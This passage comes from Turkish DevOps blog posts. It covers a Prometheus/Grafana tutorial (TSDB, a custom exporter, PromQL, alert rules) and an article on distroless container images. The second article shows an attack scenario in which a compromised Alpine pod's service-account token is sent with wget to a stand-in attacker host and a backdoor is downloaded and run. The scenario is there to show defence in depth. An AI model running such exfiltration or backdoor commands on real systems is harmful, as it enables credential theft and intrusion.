class="s">--config.file=/etc/prometheus/prometheus.yml'</span> <span class="pi">-</span> <span class="s1">'</span><span class="s">--storage.tsdb.path=/prometheus'</span> <span class="pi">-</span> <span class="s1">'</span><span class="s">--storage.tsdb.retention.time=15d'</span> <span class="pi">-</span> <span class="s1">'</span><span class="s">--web.enable-lifecycle'</span> <span class="na">grafana</span><span class="pi">:</span> <span class="na">image</span><span class="pi">:</span> <span class="s">grafana/grafana:latest</span> <span class="na">ports</span><span class="pi">:</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">3000:3000"</span> <span class="na">volumes</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">./grafana/provisioning:/etc/grafana/provisioning</span> <span class="pi">-</span> <span class="s">grafana_data:/var/lib/grafana</span> <span class="na">environment</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">GF_SECURITY_ADMIN_PASSWORD=admin</span> <span class="na">custom-exporter</span><span class="pi">:</span> <span class="na">build</span><span class="pi">:</span> <span class="s">./custom-exporter</span> <span class="na">ports</span><span class="pi">:</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">8000:8000"</span> <span class="na">volumes</span><span class="pi">:</span> <span class="na">prometheus_data</span><span class="pi">:</span> <span class="na">grafana_data</span><span class="pi">:</span> </code></pre> </div> <h2> TSDB Dosya Yapısı </h2> <p>Prometheus başladıktan sonra:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker <span class="nb">exec</span> <span class="nt">-it</span> prometheus sh <span class="nb">ls</span> /prometheus </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>chunks_head/ wal/ 01XXXXXXXXXXXXXXXXXXXXXX/ ← 2 saatlik block 01YYYYYYYYYYYYYYYYYYYYYY/ </code></pre> </div> <p><strong>WAL (Write Ahead Log):</strong> Her scrape önce WAL'a yazılır. Sistem çökerse buradan kurtarılır. Son 2 saatlik veri memory'de, WAL'da yedekleniyor.</p> <p><strong>Block yapısı:</strong> Her block 2 saatlik veri. Zamanla compaction ile birleşiyor — 2 saat → 6 saat → 24 saat → 2 hafta. Eski block'lar retention süresine göre siliniyor.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat</span> /prometheus/01XXXX.../meta.json </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"minTime"</span><span class="p">:</span><span class="w"> </span><span class="mi">1700000000000</span><span class="p">,</span><span class="w"> </span><span class="nl">"maxTime"</span><span class="p">:</span><span class="w"> </span><span class="mi">1700007200000</span><span class="p">,</span><span class="w"> </span><span class="nl">"stats"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"numSamples"</span><span class="p">:</span><span class="w"> </span><span class="mi">15420</span><span class="p">,</span><span class="w"> </span><span class="nl">"numSeries"</span><span class="p">:</span><span class="w"> </span><span class="mi">312</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"compactionLevel"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p><code>minTime</code> ve <code>maxTime</code> bu block'un kapsadığı zaman aralığı. Range query geldiğinde Prometheus sadece ilgili block'lara bakıyor — tüm veriyi taramıyor.</p> <h2> Custom Exporter </h2> <p>Prometheus kendi metric'lerini toplamak için exporter kullanıyor. Node Exporter sistem metriklerini, kube-state-metrics Kubernetes metriklerini topluyor. Kendi uygulamanın metriklerini toplamak için custom exporter yazıyorsun.</p> <p>Üç metric türü var:</p> <p><strong>Counter</strong> — sadece artar, sıfırlanmaz. Toplam istek sayısı, toplam hata sayısı.</p> <p><strong>Gauge</strong> — artıp azalabilir. Anlık CPU kullanımı, aktif connection sayısı.</p> <p><strong>Histogram</strong> — değerlerin dağılımı. Request latency, response boyutu.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">prometheus_client</span> <span class="kn">import</span> <span class="n">start_http_server</span><span class="p">,</span> <span class="n">Counter</span><span class="p">,</span> <span class="n">Gauge</span><span class="p">,</span> <span class="n">Histogram</span> <span class="kn">import</span> <span class="n">time</span><span class="p">,</span> <span class="n">random</span> <span class="n">REQUEST_COUNT</span> <span class="o">=</span> <span class="nc">Counter</span><span class="p">(</span> <span class="sh">'</span><span class="s">app_requests_total</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">Toplam istek sayisi</span><span class="sh">'</span><span class="p">,</span> <span class="p">[</span><span class="sh">'</span><span class="s">method</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">endpoint</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">status</span><span class="sh">'</span><span class="p">]</span> <span class="p">)</span> <span class="n">ACTIVE_USERS</span> <span class="o">=</span> <span class="nc">Gauge</span><span class="p">(</span> <span class="sh">'</span><span class="s">app_active_users</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">Anlik aktif kullanici sayisi</span><span class="sh">'</span> <span class="p">)</span> <span class="n">REQUEST_DURATION</span> <span class="o">=</span> <span class="nc">Histogram</span><span class="p">(</span> <span class="sh">'</span><span class="s">app_request_duration_seconds</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">Istek suresi dagilimi</span><span class="sh">'</span><span class="p">,</span> <span class="p">[</span><span class="sh">'</span><span class="s">endpoint</span><span class="sh">'</span><span class="p">],</span> <span class="n">buckets</span><span class="o">=</span><span class="p">[</span><span class="mf">0.01</span><span class="p">,</span> <span class="mf">0.05</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">,</span> <span class="mf">0.25</span><span class="p">,</span> <span class="mf">0.5</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">2.5</span><span class="p">]</span> <span class="p">)</span> <span class="k">def</span> <span class="nf">simulate_traffic</span><span class="p">():</span> <span class="n">endpoints</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">/api/users</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">/api/orders</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">/api/products</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">/health</span><span class="sh">'</span><span class="p">]</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="n">endpoint</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="nf">choice</span><span class="p">(</span><span class="n">endpoints</span><span class="p">)</span> <span class="n">status</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="nf">choice</span><span class="p">([</span><span class="sh">'</span><span class="s">200</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">200</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">200</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">404</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">500</span><span class="sh">'</span><span class="p">])</span> <span class="n">duration</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="nf">uniform</span><span class="p">(</span><span class="mf">0.01</span><span class="p">,</span> <span class="mf">0.3</span><span class="p">)</span> <span class="n">REQUEST_COUNT</span><span class="p">.</span><span class="nf">labels</span><span class="p">(</span> <span class="n">method</span><span class="o">=</span><span class="sh">'</span><span class="s">GET</span><span class="sh">'</span><span class="p">,</span> <span class="n">endpoint</span><span class="o">=</span><span class="n">endpoint</span><span class="p">,</span> <span class="n">status</span><span class="o">=</span><span class="n">status</span> <span class="p">).</span><span class="nf">inc</span><span class="p">()</span> <span class="n">REQUEST_DURATION</span><span class="p">.</span><span class="nf">labels</span><span class="p">(</span><span class="n">endpoint</span><span class="o">=</span><span class="n">endpoint</span><span class="p">).</span><span class="nf">observe</span><span class="p">(</span><span class="n">duration</span><span class="p">)</span> <span class="n">ACTIVE_USERS</span><span class="p">.</span><span class="nf">set</span><span class="p">(</span><span class="n">random</span><span class="p">.</span><span class="nf">randint</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mi">150</span><span class="p">))</span> <span class="n">time</span><span class="p">.</span><span class="nf">sleep</span><span class="p">(</span><span class="mf">0.5</span><span class="p">)</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">'</span><span class="s">__main__</span><span class="sh">'</span><span class="p">:</span> <span class="nf">start_http_server</span><span class="p">(</span><span class="mi">8000</span><span class="p">)</span> <span class="nf">simulate_traffic</span><span class="p">()</span> </code></pre> </div> <p><code>http://localhost:8000/metrics</code> adresinde şunu görürsün:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight prometheus"><code><span class="c"># TYPE app_requests_total counter</span> <span class="n">app_requests_total</span><span class="p">{</span><span class="na">endpoint</span><span class="o">=</span><span class="s2">"/api/users"</span><span class="p">,</span><span class="na">method</span><span class="o">=</span><span class="s2">"GET"</span><span class="p">,</span><span class="na">status</span><span class="o">=</span><span class="s2">"200"</span><span class="p">}</span> <span class="mf">142.0</span> <span class="c"># TYPE app_active_users gauge</span> <span class="n">app_active_users</span> <span class="mf">87.0</span> <span class="c"># TYPE app_request_duration_seconds histogram</span> <span class="n">app_request_duration_seconds_bucket</span><span class="p">{</span><span class="na">endpoint</span><span class="o">=</span><span class="s2">"/api/users"</span><span class="p">,</span><span class="na">le</span><span class="o">=</span><span class="s2">"0.1"</span><span class="p">}</span> <span class="mf">89.0</span> <span class="n">app_request_duration_seconds_bucket</span><span class="p">{</span><span class="na">endpoint</span><span class="o">=</span><span class="s2">"/api/users"</span><span class="p">,</span><span class="na">le</span><span class="o">=</span><span class="s2">"0.25"</span><span class="p">}</span> <span class="mf">134.0</span> <span class="n">app_request_duration_seconds_sum</span><span class="p">{</span><span class="na">endpoint</span><span class="o">=</span><span class="s2">"/api/users"</span><span class="p">}</span> <span class="mf">18.4</span> <span class="n">app_request_duration_seconds_count</span><span class="p">{</span><span class="na">endpoint</span><span class="o">=</span><span class="s2">"/api/users"</span><span class="p">}</span> <span class="mf">142.0</span> </code></pre> </div> <h2> PromQL </h2> <p>PromQL'i öğrenirken en önemli şey şunu anlamak: Counter'lar sürekli artar — "toplam 142 request" tek başına işe yaramaz. <code>rate</code> ile "saniyede kaç request" hesaplanır.</p> <p><strong>Temel sorgular:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># Saniyedeki istek hızı rate(app_requests_total[5m]) # Endpoint bazında grupla sum by (endpoint) (rate(app_requests_total[1m])) # Hata oranı sum(rate(app_requests_total{status="500"}[2m])) / sum(rate(app_requests_total[2m])) * 100 </code></pre> </div> <p><strong>p95 latency — production'da en çok kullandığım sorgu:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>histogram_quantile(0.95, sum by (endpoint, le) ( rate(app_request_duration_seconds_bucket[2m]) ) ) </code></pre> </div> <p><code>le</code> label'ı histogram bucket'larının üst sınırı — <code>histogram_quantile</code> için zorunlu. <code>0.95</code> → isteklerin %95'i bu sürede tamamlanıyor.</p> <p><strong>Disk dolma tahmini:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>predict_linear(prometheus_tsdb_storage_blocks_bytes[1h], 3600) </code></pre> </div> <p>Mevcut trende göre 1 saat sonraki değeri tahmin ediyor. Disk dolma alertlerinde kullanılıyor.</p> <p><strong>Metric kaybolursa:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>absent(up{job="custom-exporter"}) </code></pre> </div> <p>Uygulama çöktüğünde metric gelmez — <code>absent</code> bunu yakalar.</p> <h2> Alert Kuralları </h2> <p><code>prometheus/rules.yml</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">groups</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">app.rules</span> <span class="na">rules</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">alert</span><span class="pi">:</span> <span class="s">HighErrorRate</span> <span class="na">expr</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">sum(rate(app_requests_total{status="500"}[2m]))</span> <span class="s">/</span> <span class="s">sum(rate(app_requests_total[2m]))</span> <span class="s">&gt; 0.10</span> <span class="na">for</span><span class="pi">:</span> <span class="s">1m</span> <span class="na">labels</span><span class="pi">:</span> <span class="na">severity</span><span class="pi">:</span> <span class="s">critical</span> <span class="na">annotations</span><span class="pi">:</span> <span class="na">summary</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Hata</span><span class="nv"> </span><span class="s">orani</span><span class="nv"> </span><span class="s">yuksek"</span> <span class="na">description</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Hata</span><span class="nv"> </span><span class="s">orani</span><span class="nv"> </span><span class="s">%{{</span><span class="nv"> </span><span class="s">$value</span><span class="nv"> </span><span class="s">|</span><span class="nv"> </span><span class="s">humanizePercentage</span><span class="nv"> </span><span class="s">}}</span><span class="nv"> </span><span class="s">ulastu"</span> <span class="pi">-</span> <span class="na">alert</span><span class="pi">:</span> <span class="s">HighLatency</span> <span class="na">expr</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">histogram_quantile(0.95,</span> <span class="s">sum by (endpoint, le) (</span> <span class="s">rate(app_request_duration_seconds_bucket[2m])</span> <span class="s">)</span> <span class="s">) &gt; 0.5</span> <span class="na">for</span><span class="pi">:</span> <span class="s">1m</span> <span class="na">labels</span><span class="pi">:</span> <span class="na">severity</span><span class="pi">:</span> <span class="s">warning</span> <span class="na">annotations</span><span class="pi">:</span> <span class="na">summary</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Yuksek</span><span class="nv"> </span><span class="s">latency:</span><span class="nv"> </span><span class="s">{{</span><span class="nv"> </span><span class="s">$labels.endpoint</span><span class="nv"> </span><span class="s">}}"</span> <span class="pi">-</span> <span class="na">alert</span><span class="pi">:</span> <span class="s">ExporterDown</span> <span class="na">expr</span><span class="pi">:</span> <span class="s">up{job="custom-exporter"} == </span><span class="m">0</span> <span class="na">for</span><span class="pi">:</span> <span class="s">30s</span> <span class="na">labels</span><span class="pi">:</span> <span class="na">severity</span><span class="pi">:</span> <span class="s">critical</span> <span class="na">annotations</span><span class="pi">:</span> <span class="na">summary</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Custom</span><span class="nv"> </span><span class="s">exporter</span><span class="nv"> </span><span class="s">down"</span> </code></pre> </div> <p><code>for: 1m</code> kritik — koşul anlık doğru olduğunda alert hemen <code>firing</code> olmaz. Önce <code>pending</code>, 1 dakika boyunca koşul doğru kalırsa <code>firing</code>. Anlık spike'larda yanlış alert üretmemek için.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Koşul doğru → pending → (1 dakika geçerse) → firing Koşul yanlış → resolved </code></pre> </div> <p>Prometheus UI → <strong>Alerts</strong> sekmesinde üç durumu canlı izleyebilirsin.</p> <h2> Grafana Dashboard </h2> <p>Prometheus'u datasource olarak ekledikten sonra PromQL sorguları ile panel oluşturuyorsun.</p> <p>Kurduğum dashboard'daki paneller:</p> <p><strong>Request Rate</strong> — <code>sum by (endpoint) (rate(app_requests_total[1m]))</code> — Time series</p> <p><strong>Error Rate</strong> — hata oranı yüzdesi — Stat panel, threshold: 5% sarı, 10% kırmızı</p> <p><strong>p95 Latency</strong> — <code>histogram_quantile(0.95, ...)</code> — Time series, unit: seconds</p> <p><strong>Active Users</strong> — <code>app_active_users</code> — Gauge, threshold: 120 kırmızı</p> <p><strong>Request Dağılımı</strong> — status code bazında — Pie chart</p> <p>Dashboard'u JSON olarak export edip repository'ye ekleyebilirsin — takım arkadaşları import eder, sıfırdan kurmak zorunda kalmaz.</p> <h2> Öğrendiklerim </h2> <p>Bu lab'dan önce Prometheus'u "bir şeyleri izleyen araç" olarak görüyordum. Şimdi şunu söyleyebiliyorum:</p> <p>TSDB seçimi rastgele değil. Monitoring verisinin yazma pattern'i — düzenli aralıklarla aynı metric'lerin yazılması — TSDB için biçilmiş kaftan. Range query'ler hızlı, sıkıştırma verimli, retention yönetimi kolay.</p> <p>PromQL'de <code>rate</code> ve <code>histogram_quantile</code> olmadan anlamlı sorgu yazmak neredeyse imkânsız. Counter'ların sürekli artan yapısını anlamadan "neden bu grafik düz bir çizgi?" sorusuna cevap veremezsin.</p> <p>Custom exporter yazmak en değerli adımdı — metric türlerini anlamak için en iyi yol kendi metric'lerini oluşturmak.</p> <p><em>Bu yazı, bir mülakattan aldığım geri bildirimi uygulamalı olarak çalışma serim.</em><br> <em>Serinin diğer yazıları:</em></p> <ul> <li><em><a href="https://dev.to/tahayagizguler/terraform-terragrunt-ansible-a-hands-on-learning-journey-jed">Terraform + Terragrunt + Ansible: A Hands-On Learning Journey</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/kubernetes-probelarini-bozarak-ogrenmek-liveness-readiness-ve-startup-3meh">Kubernetes Probe'larını Kasıtlı Bozarak Öğrendim</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/container-icine-giremiyorum-ve-bu-iyi-bir-sey-distroless-imagelar-hik">Container İçine Giremiyorum — Ve Bu İyi Bir Şey: Distroless Image'lar</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/prometheus-ve-grafanayi-derinlemesine-anlamak-tsdb-promql-ve-custom-exporter-1enp">Prometheus ve Grafana'yı Derinlemesine Anlamak</a></em></li> </ul> prometheus grafana devops monitoring Container İçine Giremiyorum — Ve Bu İyi Bir Şey: Distroless Image'lar Taha Yağız Güler Tue, 26 May 2026 11:53:17 +0000 https://dev.to/tahayagizguler/container-icine-giremiyorum-ve-bu-iyi-bir-sey-distroless-imagelar-hik https://dev.to/tahayagizguler/container-icine-giremiyorum-ve-bu-iyi-bir-sey-distroless-imagelar-hik <h2> Distroless Nedir? </h2> <p>Normal bir container image düşün. İçinde uygulamanın kendisi var, ama aynı zamanda:</p> <ul> <li>Shell (<code>/bin/sh</code>, <code>/bin/bash</code>)</li> <li>Paket manager (<code>apt</code>, <code>apk</code>, <code>yum</code>)</li> <li>Sistem araçları (<code>curl</code>, <code>wget</code>, <code>ls</code>, <code>cat</code>, <code>ps</code>)</li> <li>C kütüphaneleri</li> <li>Kullanıcı yönetim araçları</li> </ul> <p>Bunların büyük çoğunluğu uygulamanın <strong>çalışması</strong> için gerekli değil. Geliştirici kolaylığı için var. Ama bir saldırgan container'a girerse bunları kullanabilir.</p> <p>Distroless image'lar bu araçların hiçbirini içermez. Google tarafından geliştirilen <code>gcr.io/distroless</code> projesi, her dil için minimal runtime image'lar sunuyor:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>gcr.io/distroless/static → Go, Rust (hiçbir runtime yok) gcr.io/distroless/base → glibc gerektiren uygulamalar gcr.io/distroless/java17 → Java 17 runtime gcr.io/distroless/nodejs20 → Node.js 20 runtime gcr.io/distroless/python3 → Python 3 runtime </code></pre> </div> <h2> Lab Ortamı </h2> <p>Docker Desktop, WSL Ubuntu. Kubernetes cluster gerekmedi — image karşılaştırması için sadece Docker yeterli. Güvenlik testleri için Docker Desktop'ın built-in Kubernetes cluster'ını kullandım.</p> <h2> Aynı Uygulamayı İki Farklı Image ile Build Et </h2> <p>Basit bir Go HTTP server:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="k">package</span> <span class="n">main</span> <span class="k">import</span> <span class="p">(</span> <span class="s">"fmt"</span> <span class="s">"net/http"</span> <span class="p">)</span> <span class="k">func</span> <span class="n">main</span><span class="p">()</span> <span class="p">{</span> <span class="n">http</span><span class="o">.</span><span class="n">HandleFunc</span><span class="p">(</span><span class="s">"/"</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">)</span> <span class="p">{</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Fprintln</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="s">"Hello from container!"</span><span class="p">)</span> <span class="p">})</span> <span class="n">http</span><span class="o">.</span><span class="n">HandleFunc</span><span class="p">(</span><span class="s">"/health"</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">)</span> <span class="p">{</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Fprintln</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="s">"OK"</span><span class="p">)</span> <span class="p">})</span> <span class="n">http</span><span class="o">.</span><span class="n">ListenAndServe</span><span class="p">(</span><span class="s">":8080"</span><span class="p">,</span> <span class="no">nil</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <p><strong>Alpine Dockerfile:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">FROM</span><span class="w"> </span><span class="s">golang:1.21-alpine</span><span class="w"> </span><span class="k">AS</span><span class="w"> </span><span class="s">builder</span> <span class="k">WORKDIR</span><span class="s"> /app</span> <span class="k">COPY</span><span class="s"> . .</span> <span class="k">RUN </span>go build <span class="nt">-o</span> server . <span class="k">FROM</span><span class="s"> alpine:3.19</span> <span class="k">WORKDIR</span><span class="s"> /app</span> <span class="k">COPY</span><span class="s"> --from=builder /app/server .</span> <span class="k">EXPOSE</span><span class="s"> 8080</span> <span class="k">ENTRYPOINT</span><span class="s"> ["./server"]</span> </code></pre> </div> <p><strong>Distroless Dockerfile:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">FROM</span><span class="w"> </span><span class="s">golang:1.21-alpine</span><span class="w"> </span><span class="k">AS</span><span class="w"> </span><span class="s">builder</span> <span class="k">WORKDIR</span><span class="s"> /app</span> <span class="k">COPY</span><span class="s"> . .</span> <span class="k">RUN </span><span class="nv">CGO_ENABLED</span><span class="o">=</span>0 go build <span class="nt">-o</span> server . <span class="k">FROM</span><span class="s"> gcr.io/distroless/static</span> <span class="k">COPY</span><span class="s"> --from=builder /app/server /server</span> <span class="k">EXPOSE</span><span class="s"> 8080</span> <span class="k">ENTRYPOINT</span><span class="s"> ["/server"]</span> </code></pre> </div> <p><code>CGO_ENABLED=0</code> kritik — distroless/static içinde C kütüphanesi yok, binary tamamen static olmalı.</p> <p>Build sonucu:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight csvs"><code><span class="k">REPOSITORY</span> <span class="k">SIZE</span> <span class="k">go</span><span class="err">-</span><span class="k">alpine</span> <span class="mf">22.1</span><span class="k">MB</span> <span class="k">go</span><span class="err">-</span><span class="k">distroless</span> <span class="mf">17</span><span class="k">MB</span> </code></pre> </div> <p>Boyut farkı bu örnekte küçük — asıl fark Python veya Node.js gibi ağır runtime'larda çok daha belirgin oluyor. Ama asıl fark zaten boyut değil.</p> <h2> Image İçeriği — Gerçek Fark Burada </h2> <p><strong>Alpine içinde ne var?</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker run <span class="nt">--rm</span> <span class="nt">-it</span> go-alpine sh </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>which sh <span class="c"># /bin/sh</span> which wget <span class="c"># /usr/bin/wget</span> which <span class="nb">ls</span> <span class="c"># /bin/ls</span> which ps <span class="c"># /bin/ps</span> apk <span class="nt">--version</span> <span class="c"># apk-tools 2.14.x</span> </code></pre> </div> <p>Shell var, araçlar var, paket manager var.</p> <p><strong>Distroless içinde ne var?</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker run <span class="nt">--rm</span> <span class="nt">-it</span> go-distroless sh </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">docker: Error response from daemon: </span><span class="gp">exec: "sh": executable file not found in $</span>PATH </code></pre> </div> <p>Shell yok — container başlamıyor bile. Başka şeyler dene:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker run <span class="nt">--rm</span> go-distroless <span class="nb">ls</span> <span class="c"># exec: "ls": no such file or directory</span> docker run <span class="nt">--rm</span> go-distroless wget <span class="c"># exec: "wget": no such file or directory</span> </code></pre> </div> <p>İçinde sadece <code>/server</code> binary'si var. Başka hiçbir şey yok.</p> <h2> Güvenlik Testi — Saldırı Senaryosu </h2> <p>Gerçekçi bir senaryo: uygulamanda RCE (Remote Code Execution) açığı var. Saldırgan container'a girdi. Ne yapabilir?</p> <p>Kubernetes'te iki pod deploy ettim:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">Pod</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">alpine-pod</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">containers</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">app</span> <span class="na">image</span><span class="pi">:</span> <span class="s">go-alpine</span> <span class="nn">---</span> <span class="na">apiVersion</span><span class="pi">:</span> <span class="s">v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">Pod</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">distroless-pod</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">containers</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">app</span> <span class="na">image</span><span class="pi">:</span> <span class="s">go-distroless</span> </code></pre> </div> <p><strong>Alpine'da saldırgan neler yapabilir:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl <span class="nb">exec</span> <span class="nt">-it</span> alpine-pod <span class="nt">--</span> sh <span class="c"># Sistemi keşfet</span> ps aux <span class="nb">cat</span> /etc/hosts <span class="nb">cat</span> /etc/resolv.conf <span class="c"># Secret ve token ara</span> <span class="nb">env</span> | <span class="nb">grep</span> <span class="nt">-i</span> secret <span class="nb">cat</span> /var/run/secrets/kubernetes.io/serviceaccount/token <span class="c"># Dosya sistemini tara</span> find / <span class="nt">-name</span> <span class="s2">"*.env"</span> 2&gt;/dev/null find / <span class="nt">-name</span> <span class="s2">"*.key"</span> 2&gt;/dev/null <span class="c"># Dışarıya veri sızdır</span> <span class="nv">TOKEN</span><span class="o">=</span><span class="si">$(</span><span class="nb">cat</span> /var/run/secrets/kubernetes.io/serviceaccount/token<span class="si">)</span> wget <span class="nt">-q</span> <span class="nt">-O-</span> <span class="s2">"http://saldirgan.com/collect?token=</span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="c"># Backdoor indir</span> wget http://saldirgan.com/backdoor <span class="nt">-O</span> /tmp/bd <span class="nb">chmod</span> +x /tmp/bd <span class="o">&amp;&amp;</span> /tmp/bd &amp; </code></pre> </div> <p>Her şey çalışıyor. Container ele geçirildi, lateral movement başladı.</p> <p><strong>Distroless'ta aynı senaryoyu dene:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl <span class="nb">exec</span> <span class="nt">-it</span> distroless-pod <span class="nt">--</span> sh <span class="c"># exec: "sh": executable file not found</span> kubectl <span class="nb">exec </span>distroless-pod <span class="nt">--</span> ps <span class="c"># exec: "ps": executable file not found</span> kubectl <span class="nb">exec </span>distroless-pod <span class="nt">--</span> <span class="nb">env</span> <span class="c"># exec: "env": executable file not found</span> kubectl <span class="nb">exec </span>distroless-pod <span class="nt">--</span> wget <span class="c"># exec: "wget": executable file not found</span> </code></pre> </div> <p>Saldırgan RCE açığını başarıyla exploit etti. Ama container içinde elleri boş:</p> <ul> <li>Shell alamıyor</li> <li>Sistemi keşfedemiyor</li> <li>Token okuyamıyor</li> <li>Dışarıya veri gönderemiyor</li> <li>Yeni araç indiremiyor</li> </ul> <p><strong>kubectl exec çalışmaması bir kısıtlama değil, özellik.</strong> Sen giremiyorsan saldırgan da giremiyor.</p> <blockquote> <p><strong>Not:</strong> Distroless saldırıyı imkânsız kılmıyor. RCE açığını kapatmak hâlâ birincil öncelik. Distroless ikinci savunma katmanı — "açık olsa bile zarar sınırlı olsun."</p> </blockquote> <h2> "Peki Debug Nasıl Yapacağım?" </h2> <p>Shell olmadan production'da sorun çıktığında ne yaparsın? Cevap: <code>kubectl debug</code> ve ephemeral container.</p> <p>Ephemeral container, çalışan bir pod'a geçici olarak eklenen debug container. Pod'un namespace'ini paylaşıyor ama pod'un image'ını değiştirmiyor.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl debug <span class="nt">-it</span> distroless-pod <span class="se">\</span> <span class="nt">--image</span><span class="o">=</span>busybox <span class="se">\</span> <span class="nt">--target</span><span class="o">=</span>app </code></pre> </div> <p>İçerdesin:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Distroless pod'un process'lerini gör</span> ps aux <span class="c"># PID 1: /server ← distroless'taki uygulama</span> <span class="c"># PID 12: sh ← senin debug shell'in</span> <span class="c"># Environment variable'ları oku</span> <span class="nb">cat</span> /proc/1/environ | <span class="nb">tr</span> <span class="s1">'\0'</span> <span class="s1">'\n'</span> <span class="c"># Network bağlantıları</span> <span class="nb">cat</span> /etc/hosts <span class="nb">exit</span> </code></pre> </div> <p>Production pod'una dokunmadın. Ephemeral container geçici — debug bitince gidiyor.</p> <p><strong>Production pod'una hiç dokunmak istemiyorsan kopyasını al:</strong><br> </p> <div class="highlight js-code-highlight"> 